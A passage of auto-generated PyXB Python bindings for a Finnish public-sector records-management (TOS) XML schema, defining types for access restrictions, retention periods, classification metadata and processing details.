HenkilotietoluonneKoodi = property(__HenkilotietoluonneKoodi.value, __HenkilotietoluonneKoodi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
_ElementMap.update({
__JulkisuusluokkaKoodi.name() : __JulkisuusluokkaKoodi,
__SalassapitoAikaArvo.name() : __SalassapitoAikaArvo,
__SalassapitoPerusteTeksti.name() : __SalassapitoPerusteTeksti,
__SalassapidonLaskentaperusteTeksti.name() : __SalassapidonLaskentaperusteTeksti,
__SuojaustasoKoodi.name() : __SuojaustasoKoodi,
__TurvallisuusluokkaKoodi.name() : __TurvallisuusluokkaKoodi,
__HenkilotietoluonneKoodi.name() : __HenkilotietoluonneKoodi,
__Laajennos.name() : __Laajennos
})
_AttributeMap.update({
})
_module_typeBindings.kayttorajoitusTiedotTyyppi = kayttorajoitusTiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'kayttorajoitusTiedotTyyppi', kayttorajoitusTiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysaikaTiedotTyyppi with content type ELEMENT_ONLY
class sailytysaikaTiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysaikaTiedotTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'sailytysaikaTiedotTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SailytysajanPituusArvo uses Python identifier SailytysajanPituusArvo
__SailytysajanPituusArvo = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPituusArvo'), 'SailytysajanPituusArvo', '__httpskeemat_jhs_suositukset_fitos20150115_sailytysaikaTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SailytysajanPituusArvo', False, None, )
SailytysajanPituusArvo = property(__SailytysajanPituusArvo.value, __SailytysajanPituusArvo.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SailytysajanPerusteTeksti uses Python identifier SailytysajanPerusteTeksti
__SailytysajanPerusteTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPerusteTeksti'), 'SailytysajanPerusteTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_sailytysaikaTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SailytysajanPerusteTeksti', False, None, )
SailytysajanPerusteTeksti = property(__SailytysajanPerusteTeksti.value, __SailytysajanPerusteTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SailytysajanLaskentaperusteTeksti uses Python identifier SailytysajanLaskentaperusteTeksti
__SailytysajanLaskentaperusteTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanLaskentaperusteTeksti'), 'SailytysajanLaskentaperusteTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_sailytysaikaTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SailytysajanLaskentaperusteTeksti', False, None, )
SailytysajanLaskentaperusteTeksti = property(__SailytysajanLaskentaperusteTeksti.value, __SailytysajanLaskentaperusteTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_sailytysaikaTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
_ElementMap.update({
__SailytysajanPituusArvo.name() : __SailytysajanPituusArvo,
__SailytysajanPerusteTeksti.name() : __SailytysajanPerusteTeksti,
__SailytysajanLaskentaperusteTeksti.name() : __SailytysajanLaskentaperusteTeksti,
__Laajennos.name() : __Laajennos
})
_AttributeMap.update({
})
_module_typeBindings.sailytysaikaTiedotTyyppi = sailytysaikaTiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'sailytysaikaTiedotTyyppi', sailytysaikaTiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TosTiedotTyyppi with content type ELEMENT_ONLY
class TosTiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TosTiedotTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TosTiedotTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TilaKoodi uses Python identifier TilaKoodi
__TilaKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), 'TilaKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TilaKoodi', False, None, )
TilaKoodi = property(__TilaKoodi.value, __TilaKoodi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TosVersio uses Python identifier TosVersio
__TosVersio = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TosVersio'), 'TosVersio', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TosVersio', False, None, )
TosVersio = property(__TosVersio.value, __TosVersio.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LisatiedotTeksti uses Python identifier LisatiedotTeksti
__LisatiedotTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LisatiedotTeksti'), 'LisatiedotTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LisatiedotTeksti', False, None, )
LisatiedotTeksti = property(__LisatiedotTeksti.value, __LisatiedotTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
__OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
__LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
__LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
__MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
__MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
__HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
__HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
__VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
__VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}YhteyshenkiloNimi uses Python identifier YhteyshenkiloNimi
__YhteyshenkiloNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'YhteyshenkiloNimi'), 'YhteyshenkiloNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115YhteyshenkiloNimi', False, None, )
YhteyshenkiloNimi = property(__YhteyshenkiloNimi.value, __YhteyshenkiloNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Nimeke uses Python identifier Nimeke
__Nimeke = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), 'Nimeke', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Nimeke', False, None, )
Nimeke = property(__Nimeke.value, __Nimeke.set, None, None)
# Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
__id._DeclarationLocation = None
__id._UseLocation = None
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
__TilaKoodi.name() : __TilaKoodi,
__TosVersio.name() : __TosVersio,
__LisatiedotTeksti.name() : __LisatiedotTeksti,
__OrganisaatioNimi.name() : __OrganisaatioNimi,
__LaatijaNimi.name() : __LaatijaNimi,
__LaadittuPvm.name() : __LaadittuPvm,
__MuokkaajaNimi.name() : __MuokkaajaNimi,
__MuokattuPvm.name() : __MuokattuPvm,
__HyvaksyjaNimi.name() : __HyvaksyjaNimi,
__HyvaksyttyPvm.name() : __HyvaksyttyPvm,
__VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
__VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
__YhteyshenkiloNimi.name() : __YhteyshenkiloNimi,
__Laajennos.name() : __Laajennos,
__Nimeke.name() : __Nimeke
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.TosTiedotTyyppi = TosTiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'TosTiedotTyyppi', TosTiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}luokkaTyyppi with content type ELEMENT_ONLY
class luokkaTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}luokkaTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'luokkaTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TilaKoodi uses Python identifier TilaKoodi
__TilaKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), 'TilaKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115TilaKoodi', False, None, )
TilaKoodi = property(__TilaKoodi.value, __TilaKoodi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OsaVersio uses Python identifier OsaVersio
__OsaVersio = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OsaVersio'), 'OsaVersio', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115OsaVersio', False, None, )
OsaVersio = property(__OsaVersio.value, __OsaVersio.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Luokitustunnus uses Python identifier Luokitustunnus
__Luokitustunnus = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Luokitustunnus'), 'Luokitustunnus', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115Luokitustunnus', False, None, )
Luokitustunnus = property(__Luokitustunnus.value, __Luokitustunnus.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LuokitusKuvausTeksti uses Python identifier LuokitusKuvausTeksti
__LuokitusKuvausTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LuokitusKuvausTeksti'), 'LuokitusKuvausTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115LuokitusKuvausTeksti', False, None, )
LuokitusKuvausTeksti = property(__LuokitusKuvausTeksti.value, __LuokitusKuvausTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
__OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
__LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
__LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
__MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
__MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
__HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
__HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
__VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
__VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Nimeke uses Python identifier Nimeke
__Nimeke = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), 'Nimeke', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115Nimeke', False, None, )
Nimeke = property(__Nimeke.value, __Nimeke.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}KasittelyprosessiTiedot uses Python identifier KasittelyprosessiTiedot
__KasittelyprosessiTiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessiTiedot'), 'KasittelyprosessiTiedot', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115KasittelyprosessiTiedot', False, None, )
KasittelyprosessiTiedot = property(__KasittelyprosessiTiedot.value, __KasittelyprosessiTiedot.set, None, None)
# Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
__id._DeclarationLocation = None
__id._UseLocation = None
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
__TilaKoodi.name() : __TilaKoodi,
__OsaVersio.name() : __OsaVersio,
__Luokitustunnus.name() : __Luokitustunnus,
__LuokitusKuvausTeksti.name() : __LuokitusKuvausTeksti,
__OrganisaatioNimi.name() : __OrganisaatioNimi,
__LaatijaNimi.name() : __LaatijaNimi,
__LaadittuPvm.name() : __LaadittuPvm,
__MuokkaajaNimi.name() : __MuokkaajaNimi,
__MuokattuPvm.name() : __MuokattuPvm,
__HyvaksyjaNimi.name() : __HyvaksyjaNimi,
__HyvaksyttyPvm.name() : __HyvaksyttyPvm,
__VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
__VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
__Laajennos.name() : __Laajennos,
__Nimeke.name() : __Nimeke,
__KasittelyprosessiTiedot.name() : __KasittelyprosessiTiedot
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.luokkaTyyppi = luokkaTyyppi
Namespace.addCategoryObject('typeBinding', 'luokkaTyyppi', luokkaTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeKielellaTyyppi with content type ELEMENT_ONLY
class nimekeKielellaTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeKielellaTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'nimekeKielellaTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}NimekeTeksti uses Python identifier NimekeTeksti
__NimekeTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), 'NimekeTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_nimekeKielellaTyyppi_httpskeemat_jhs_suositukset_fitos20150115NimekeTeksti', False, None, )
NimekeTeksti = property(__NimekeTeksti.value, __NimekeTeksti.set, None, None)
# Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kieliKoodi uses Python identifier kieliKoodi
__kieliKoodi = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'kieliKoodi'), 'kieliKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_nimekeKielellaTyyppi_httpskeemat_jhs_suositukset_fitos20150115kieliKoodi', _module_typeBindings.kieliKoodiTyyppi, required=True)
__kieliKoodi._DeclarationLocation = None
__kieliKoodi._UseLocation = None
kieliKoodi = property(__kieliKoodi.value, __kieliKoodi.set, None, None)
_ElementMap.update({
__NimekeTeksti.name() : __NimekeTeksti
})
_AttributeMap.update({
__kieliKoodi.name() : __kieliKoodi
})
_module_typeBindings.nimekeKielellaTyyppi = nimekeKielellaTyyppi
Namespace.addCategoryObject('typeBinding', 'nimekeKielellaTyyppi', nimekeKielellaTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelyprosessiTiedotTyyppi with content type ELEMENT_ONLY
class kasittelyprosessiTiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelyprosessiTiedotTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kasittelyprosessiTiedotTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
__OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TietojarjestelmaNimi uses Python identifier TietojarjestelmaNimi
__TietojarjestelmaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), 'TietojarjestelmaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TietojarjestelmaNimi', False, None, )
TietojarjestelmaNimi = property(__TietojarjestelmaNimi.value, __TietojarjestelmaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
__LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
